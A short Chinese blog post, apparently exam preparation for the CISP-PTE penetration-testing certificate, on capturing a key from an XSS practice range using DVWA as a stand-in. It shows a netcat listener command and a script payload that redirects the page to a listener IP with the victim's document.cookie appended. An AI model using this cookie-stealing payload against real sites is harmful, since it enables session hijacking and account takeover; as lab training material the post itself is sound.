cisp-pte靶场通关思路分享----xss篇

考试也可能会遇到xss，很可惜也没有弄到xss的靶场，但是我们可以模拟出一个类似考场的环境，这里用了dvwa。

xss靶场里key最有可能在的位置就是cookie里。考试用到的工具NC。

首先找到转发工具的里nc.exe，双击后输入命令 nc -Lv -p 1111

监听1111端口这里如果用小写的l会在收到一次信息后闪退-p是指定端口，-v是输出详细信息

然后我们在靶场中存在xss的地方构造payload

<script>document.location='http://192.168.3.70:1111/?cookie='+document.cookie; alert('getit')</script>

如果是考试，图可能是这样的。

posted @ 2021-06-14 02:50 我有清茶与酒阅读(1294) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部